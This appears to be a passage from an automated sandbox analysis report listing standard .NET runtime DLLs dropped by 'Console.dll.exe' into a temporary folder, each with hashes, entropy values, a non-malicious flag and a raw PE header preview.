                                                                                                                                                                                                                        SHA-512:2106E30A5E6C544B2F9CE5DF5F70437F824F04A2E21E1E3209DDCE09AAE815B1284C818C5C8DB571A450728D5BB421AEBC9ACAB1CFD1065374991FFC2BD5601C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N.............!.....p... ....................@.................................V.....@............................................. ................(......$.......p........................................................... ...H............text....g.......p.................. ..`.data...............................@....reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15520
                                                                                                                                                                                                                        Entropy (8bit):6.82983139366935
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:o7e1e0xArHWXUWi9uWXebPpUNTQHnhWgN7aIW8RmvbTseUfX01k9z3AcgkS85:oCUicWXUWi9Tb2HRN7VRmv/6fR9zjgO
                                                                                                                                                                                                                        MD5:41BABDEC1A44D76066FB7BC8BA150AE7
                                                                                                                                                                                                                        SHA1:3CD7AF0A00257E26FBFB62FADE5C3FC6B76AA17A
                                                                                                                                                                                                                        SHA-256:099AEA26723DF7D876FF3D6CF8C50CE2995A4D62BEBC460BC6D25C4BBD75A0A2
                                                                                                                                                                                                                        SHA-512:49C5DF7B73D7C7736CA1C85E75EDDFBB36D33C9FB08257E67A7AAFCF1C4F58A439DBBD48DF682594F25102EF862A62821E0ACD1E8C948E065C6F3BA5980E3531
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;..........." ..0..............)... ...@....... ..............................@.....`.................................{)..O....@..d................(...`......X(..T............................................ ............... ..H............text........ ...................... ..`.rsrc...d....@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..(.......#Strings............#US.........#GUID...........#Blob......................3............................................................@.O.........k.....&.7.....7...V.....l.7...;.7.....7.....7.....7...".7...T.7.................I.....I.....I...).I...1.I...9.I...A.I...I.I...Q.I...Y.I...a.I...i.I...q.I...y.I.......................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):88224
                                                                                                                                                                                                                        Entropy (8bit):6.272091775180111
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:c0ZJn3rsXzaEDNeUCtbWbB66+67NVpnSPM+l5+WkmVxbCrz/mGviiCzo:c0Xn7sWEDEUCtbUXdSPM+rlkmLbWmGBp
                                                                                                                                                                                                                        MD5:63B6E3059DFABD63B7894D0ABA8620FC
                                                                                                                                                                                                                        SHA1:53629008DF91C87C8EE1DBA270F10CE139A27611
                                                                                                                                                                                                                        SHA-256:C95D927324BAE05FA174BDBF6D969FC61054F6237B2CF1ED90DB54A4D88F3D35
                                                                                                                                                                                                                        SHA-512:4BBF627AD141A3040FC38B9B43DF4F0BCF3E4C431B92F780799804A53E7DE1AF123DA745884D07DABEC8B78E9D512051733D7DE978213DE3A6E2A15873FEF6E1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!......... ....................@..........................0......8'....@..................................................$.......0...(... ..X...T...p...............................................................H............text............................... ..`.data...k...........................@....reloc..X.... ....... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Intrinsics.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17160
                                                                                                                                                                                                                        Entropy (8bit):6.608952558363913
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:lCYQZrDBnWvLWihuWXebPpUNTQHnhWgN7acWo0y9KDUX01k9z3AeSoG:lnA3BWvLWihTb2HRN7XnpR9zNjG
                                                                                                                                                                                                                        MD5:7441A71C36952EE88FBA2CCA3E61D947
                                                                                                                                                                                                                        SHA1:4D7EDBBF8FF71489547108A024B6BBC008A416E7
                                                                                                                                                                                                                        SHA-256:79F4E2407FBC0FDC0BA98D5354CBB7FC861EF5DA0B187FDA56978A8DED6F8061
                                                                                                                                                                                                                        SHA-512:E6DEBDF07C83F0CDB119383331F3E6A09626F96D1A1DD21B8F4A092F9675D33D824073D5A383BF6BB2BD536D2E52DD8F7B1D81C9D6546E076B82DB90560E0D5A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w............."!..0.............~/... ........@.. ...............................7....`.................................#/..X....@...................)...`......,...T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`/......H........ ..\...................P ......................................u....G.b.\B.]f....{..&H:....#.K[.....\.?(: 1`7..m,t.....eCb.H......z..).L....x...'F!.E...8c{.....(.m....A..a.m.}....~r......BSJB............v4.0.30319......`.......#~..P...d...#Strings............#GUID...........#Blob......................3................................M.....I.........B.$.....$...[.....D...........A.............k........."...........{.......................b.....o.......$...........

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Loader.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.746709640384306
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:oNTlhOxgWzGWihuWXebPpUNTQHnhWgN7acWNqapnyttuX01k9z3AWPoD9CQP3ok:oNTlmgWzGWihTb2HRN7insSR9zdPaJvt
                                                                                                                                                                                                                        MD5:36D571CC55B0BED0FF9EDF4A33D31C66
                                                                                                                                                                                                                        SHA1:BFF2371D6CD510AE37CC1B1D85C2015CE7AD3A5E
                                                                                                                                                                                                                        SHA-256:A5F189508B3DF4E3D14E457FE8EB8DBA340C2FC5516C6A6DABE8FE0CB2F4019B
                                                                                                                                                                                                                        SHA-512:9C5A5A8937738186321E26C2FAA8A115FBA3F38DE20089EA727DFA6B02EBD8D33C5144716B3A46AC33CDE3FD3C31BE9B3FDF0E1F05CAE2274512800A19527D4F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=............"!..0..............*... ........@.. ...................................`..................................*..X....@...................)...`.......)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........ ......................P .......................................4Yg.q5...Q.E....L...|u.b[\.%.IiK.o..0-...\..#.I+...9ZI.]...iG..?i......00...P_.>F.. .sZ7.X.DW..Q1.p..By.Ma...Yd.A.!c.BSJB............v4.0.30319......`...(...#~..........#Strings....0.......#GUID...@.......#Blob......................3..................................................P...X.P...p.....p.......v...V.....z.....).......1.....1...?...........>...............................P...........

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Numerics.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):313520
                                                                                                                                                                                                                        Entropy (8bit):6.878225262273903
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:Tj/vTweffhrbxMM8X0limy2Hz91QV5CGwt9dVOMjK0N8naM:Dweffh5Snmy2Hz0V5Crt9dpCaM
                                                                                                                                                                                                                        MD5:C48DBF0D65CBD011E9BFFA655C19C520
                                                                                                                                                                                                                        SHA1:DD51B2E394FBF71837CFCFEAAB96DEDDA346F98E
                                                                                                                                                                                                                        SHA-256:152C8A0206471B5AF4E1F9F4B74D230FFC87CF6A9B1F775BC904453AF4F6CBD5
                                                                                                                                                                                                                        SHA-512:315124026A6392FC986D0E758E2874106EA579317DD1B0880920DFC262BAA1C6209112CE705D4DDCA834CEF75BDB57CE01DE097381DF6C9C8FE87EBA2FF7CB80
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...."............!.....P...@...............`....@.................................RK....@..................................................\..p........(..........H ..p...............................................................H............text....K.......P.................. ..`.data........`... ...`..............@....reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Formatters.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):293024
                                                                                                                                                                                                                        Entropy (8bit):6.677738591144959
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:FZ2zbdCK59h3YIu2mcnJH5xBVnITPrVBSEMfG4A6zTOg:TWbdCK5XIymcnV5xBVi6G4dz6g
                                                                                                                                                                                                                        MD5:111E6250A3478A605F72E94F773458A9
                                                                                                                                                                                                                        SHA1:0DDC531FD23D0B40C1D24B2752ED0F8EC1682477
                                                                                                                                                                                                                        SHA-256:89FA32D773EF10F47DEED9708488B010E0692CD4EADDBD194078D5A5E596C75C
                                                                                                                                                                                                                        SHA-512:189BBFB7A8EC0B242E8CCE675396F6089882A6CFD9345B048C3501835A6DC28813404C235A6CA3B9962262C800A0B0F138C3D026255DC2D289418A7455383146
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l~............!.........p....................@..........................P...........@..................................................P.......P...(... ...'...#..p...............................................................H............text...:........................... ..`.data...j9.......@..................@....reloc...'... ...0... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Json.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                        Entropy (8bit):6.729558736816759
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:ishg1xc98VWbRdB5WiS3WT56Os1HnhWgN7aIWf6CjVi6KrIX01k9z3A5UOpFh:v2W8VWbRdB5Wi75kHRN7949R9zexpb
                                                                                                                                                                                                                        MD5:1534BF6331EC8E7282AAF20F63DDA157
                                                                                                                                                                                                                        SHA1:9EBE5805BE5249321062CCA140A63FA164EB996E
                                                                                                                                                                                                                        SHA-256:2CE70EABF317B251D429122226535EB17902DBF1B452EFC7B1CE1DA8A3DFCC1F
                                                                                                                                                                                                                        SHA-512:1BA0D5F4376265E7156C1761DB57D570AC87FA5475B253418A41055ADCE137787E212B6BACCBA1684D148E6B4C11C6C1F48B73A6591E7593FA8ECC0230E765BC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............*... ........@.. ...............................I....`.................................S*..X....@...................(...`......L)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........ ..|...................P ........................................E..2....I>..M..[....F..~.......}.8q.....~~..By1.T#.....G9x.T..8.Vn.-......0.....B.RBA...._[....A............|.Z..Y9..?BSJB............v4.0.30319......`.......#~..x...d...#Strings............#GUID...........#Blob......................3............................................................3...........^.......O.....O...a.....w.O.....O.....O...w.O.....O.....O...G.O...I.........................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Primitives.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):39072
                                                                                                                                                                                                                        Entropy (8bit):5.098557637395365
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:CHWF1JBrWiTChpuT7+aFGUl69R9pnUkO2akIGt6HHDmax1+3Kx1Tb2HRN7g6R9z9:Cq1JBUp2QUlw9pnskzy/ig29zKY
                                                                                                                                                                                                                        MD5:A214B07A5E267E6FA853B995A00F8B9F
                                                                                                                                                                                                                        SHA1:82DA9439D5BAD83153CABCF8B58EB7F674EB94D2
                                                                                                                                                                                                                        SHA-256:FD61A97B1FC099FF738B5BD342A8B0264C295F3F493EFBEE32DE025DB977EBE0
                                                                                                                                                                                                                        SHA-512:63B6E565D1A9447DB961D1F74D54073E446FC157CA79C130BD945022BE82F7B750EB50E1E8272F565832BDE6B685657CD26D346582CEB75430738068D9B650F5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z~/............!.....@... ...............P....@..........................p.......F....@..........................................................p...(...`..........p...............................................................H............text...+;.......@.................. ..`.data...-....P.......P..............@....reloc.......`.......`..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Xml.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17168
                                                                                                                                                                                                                        Entropy (8bit):6.669102799761363
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:75krZI8NHGMWsNBBgWiLTb2HRN7pFFDR9zkA4kaaDmN:75krZI8NHGiNBB6/iBl9zkTwDQ
                                                                                                                                                                                                                        MD5:CF8CEAA793EB4FB886AE05EED62F0AD3
                                                                                                                                                                                                                        SHA1:F57D31CE29292574386C6F5115FF555479BFDB7D
                                                                                                                                                                                                                        SHA-256:0B846E7E4AEC61C7632815F229DC6BCFF3B8AE93258D9278665C9AA2686706AF
                                                                                                                                                                                                                        SHA-512:FE08C686013D9D60F648DBF0CB8FDE3A103AD946B4CDD72666D20063C5FF959AC8B5CCF403997C866E77430B6E70AA5ADEADC2C585270146D16E130A6582C175
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F............"!..0.................. ........@.. ...................................`.................................M...N....@...................)...`......H-..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................H........ ..x...................P ......................................o..<..d....O..+V5.].q...~..9...Q.N..C....(......`.9@.....9.k]..(k'..h.f..Z..p.R......W.T.g.f..|...&....Z1,..2..w.e:3...BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3................................"...........................W.a...............=.............Q.........R.......................9.....k.....m...................A.....

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17160
                                                                                                                                                                                                                        Entropy (8bit):6.682747898632052
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:+6Xu2tNCj8NVLWgM4BHWiUTb2HRN72/gLSR9zdPaqKeQ:ZXNtNCj8NVPM4BY/i2/4e9zBu
                                                                                                                                                                                                                        MD5:E6AD5E9C4B3397578816E2320D071D40
                                                                                                                                                                                                                        SHA1:C39502C9A8C2C8D903DA1166CD107681714EB7C9
                                                                                                                                                                                                                        SHA-256:171187B001419E23577AD8C9AA550E551732088D068151D8727F56B90E1E1FAF
                                                                                                                                                                                                                        SHA-512:A015C4D4CE8FBB08052DC96804F2A5D2C10F01B1561DF06A20038D192DB12FCE8C51BEFD395BDC9FBD22A83F04E215ABE66646E907986340405219352A2C8611
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0............../... ...@....... ....................................`.................................u/..O....@...................)...`......|...T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................./......H.......P .......................-......................................BSJB............v4.0.30319......l...d...#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................~...<.~.....S...........Z...a.;...{.;.........#.;.....;...0.;.....;.....;.....;.....;.................3.....3.....3...).3...1.3...9.3...A.3...I.3...Q.3...Y.3...a.3...i.3...q.3...y.3.......:.....C.....b...#.k...+.....+.....3.....;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):43680
                                                                                                                                                                                                                        Entropy (8bit):5.835459519848311
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:K+1fsSED2vCeDQvRzXB3gWql6375IVxedktN7xPBhwsR/JG39QRoNvsh2JcfoDL9:OB/LuYdy50b4b7RSHfxXilnz6n
                                                                                                                                                                                                                        MD5:AA3C3668E72CF81C8364A923E6EF5DD9
                                                                                                                                                                                                                        SHA1:67990E237F45E33FF976C6D3DF3CF0565A36AA18
                                                                                                                                                                                                                        SHA-256:B8493A46E602CF769BF864553D55BB425E4D4C54B9FA1F8588C7DC607D56DE53
                                                                                                                                                                                                                        SHA-512:E1ED39F8BDCDFF20CC39AF33CAF53197B143E1D8C2D7D2B06DAD2EA48F53CCE6633886DBA56C3343CCDFAFDBE9E57D3FA620ABB73BDF6938EAA118500FF1ED80
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z............."!..0..x.............. ........@.. ..............................U.....`.....................................Z.......T................(..............T............................................ ............... ..H............text....w... ...x.................. ..`.rsrc...T............z..............@..@.reloc..............................@..B.......................H........ ...u..................P .......................................o.:y.....2T..M./.~.)U...6.(;.%-..._...wfJl..........b..K........\.>#.:......sLR...:...VG"\....8.9.=....=......>|C.(J..pk7oGBSJB............v4.0.30319......`....2..#~...2..T@..#Strings....<s......#GUID...Ls......#Blob......................3................................{......#...........6..`..6....m6..(7....4.. .....%.....%....m#.....6...!.6..&..%.....%.....%..s..%.....%.....%.....%.....6..........

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.AccessControl.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):211120
                                                                                                                                                                                                                        Entropy (8bit):6.597484696155592
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:PRFpVNT0XdbHhKKyrV8/6Xe9QF+wVkjoXHs3eOnnl2O2/Wo:ZXTyT0Ky5jHEnl2OA
                                                                                                                                                                                                                        MD5:E2C9BD41E65A59BA77A51DE430888F63
                                                                                                                                                                                                                        SHA1:F5B68188E92225FC564C3F7AB589B791BB962391
                                                                                                                                                                                                                        SHA-256:05C38CB163353158FF3AAD740F5AB667A98BBB7AD59CA2FDFBD5AAD5CF8D2740
                                                                                                                                                                                                                        SHA-512:4706E519933230436CBF4683992BB411A785CDD2E1B69F6B663828D7C04156ACECE53BB46D0520E128218DBD9BD6FD13D221232C7C6D10F0AB65A44A8B5F69B8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........@....................@..................................F....@.................................................4:...........(.........., ..p...............................................................H............text...S........................... ..`.data............ ..................@....reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Claims.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):92424
                                                                                                                                                                                                                        Entropy (8bit):6.096398597731084
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:9h1BBLVzX+bX5SaauDQp6O/URxOQwQ7rzUU3q2bP6cyYjipazS1:9h1t+bJSdu6yQYL+1
                                                                                                                                                                                                                        MD5:6F0D927BC0B2606A045019F895AED564
                                                                                                                                                                                                                        SHA1:43492AF1F4217953FAA342A3AA412C2C3DC82AB9
                                                                                                                                                                                                                        SHA-256:24A24A67438506F41DDAAEC3C4A9C341CC791FBB4EBC371118A5E38D5CE8902B
                                                                                                                                                                                                                        SHA-512:FB4BF13DB7EDC66F31496A8EF1F22A3919F67C05C664FC56356DAE1B5AD97CEA189B92D164C338AA32FE739286892C64C3207027BC633D5A880BD37676C9238D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!............!......... ............... ....@..........................@............@..................................................!.......@...)...0......4...p...............................................................H............text...t........................... ..`.data........ ....... ..............@....reloc.......0.......0..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Algorithms.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17696
                                                                                                                                                                                                                        Entropy (8bit):6.614349520753669
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:c0qRPW5BWiHv5kHRN7GkXC4deR9zZjmNG2:jCOBaGkXC4dC9zZjyG
                                                                                                                                                                                                                        MD5:1F1F6456619AD524677902BA8BC98818
                                                                                                                                                                                                                        SHA1:D7236F5F9F600C57E558495A2CA99FD085C33D1C
                                                                                                                                                                                                                        SHA-256:DA097B59EBB3012D5437B81E21E8BCA80FB76F2A124C5AA232FDFCF49E1816BB
                                                                                                                                                                                                                        SHA-512:BE65A25550C0F24073224F760A5F5E772F43BE70C108528C9321D76150EE9E61D1DA19C7631AECE19F526CA943B8F0F0EAC227246588B0848FB6AB583EB76824
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2.!..........." ..0.............R0... ...@....... ...................................`................................../..O....@.................. )...`..........T............................................ ............... ..H............text...X.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................30......H.......P .. ...................p.......................................BSJB............v4.0.30319......l.......#~..t.......#Strings....|.......#US.........#GUID...........#Blob......................3................................>...........................?.....6.....j.....%.d.....d...U.M...k.d...:.d.....d.....d.....d...!.d...S.d.....H...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Cng.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16656
                                                                                                                                                                                                                        Entropy (8bit):6.712618161466492
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:5EH92CWofWiYTb2HRN7eFDR9zkA4kkMra27:ydzM/iWl9zkT8W27
                                                                                                                                                                                                                        MD5:8DB950DB3197032ECF817B076B750623
                                                                                                                                                                                                                        SHA1:9F5D1A711D3D1C29FA97BB0319AF5F1FB1700C0A
                                                                                                                                                                                                                        SHA-256:01534944F8792BDD953F0436102B18F22D35875FE80AAB019785F29251B386E7
                                                                                                                                                                                                                        SHA-512:C831E3A959977B5BBD4A2DD12CFCE6665536D3AB51B121D8FF26F3FB753B5958386611248E7FAEB6EA7FDBDB59276D4D3FBC353F038CB01F3AACF8D57128AB40
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^v-..........." ..0..............,... ...@....... ..............................w3....`..................................,..O....@...................)...`.......+..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P ...................... +......................................BSJB............v4.0.30319......l...<...#~..........#Strings....0.......#US.4.......#GUID...D.......#Blob......................3......................................d.........J.!.....!.........A.......J...n.....,.........................................j.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Csp.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                        Entropy (8bit):6.777938944870474
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:jbUyuWItWi15kHRN7NdlctHNsAR9zdCaCUQKf:jbBY6Ndgts89zI5Ux
                                                                                                                                                                                                                        MD5:E4ACBC2EA48EE1CFB3DB3D8DDD89252A
                                                                                                                                                                                                                        SHA1:370FA808048AA4251DE7E16E01AE4437505C34B9
                                                                                                                                                                                                                        SHA-256:03B900E8CAA4F4E9E144F7541C65DD685D1A20B70BBF8D7359DFA2E9EE1A612B
                                                                                                                                                                                                                        SHA-512:3914E3F33D15ED246D4038F243539B1C6ACF68C2511D11BCA25D53F34C706BBFAD4A7FFE9A43E1BF102692F590DE8502F547BC54768273748908EE200B2AC12F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...baC..........." ..0..............+... ...@....... ...............................&....`.................................}+..O....@...................(...`......|*..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P .......................)......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID... .......#Blob......................3......................................................x.....3.n.........^.................I....._.................w.................G...................h.....h.....h...).h...1.h...9.h...A.h...I.h...Q.h...Y.h...a.h...i.h...q.h...y.h.......................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Encoding.dll

                                                                                                                                                                                                                        Download File
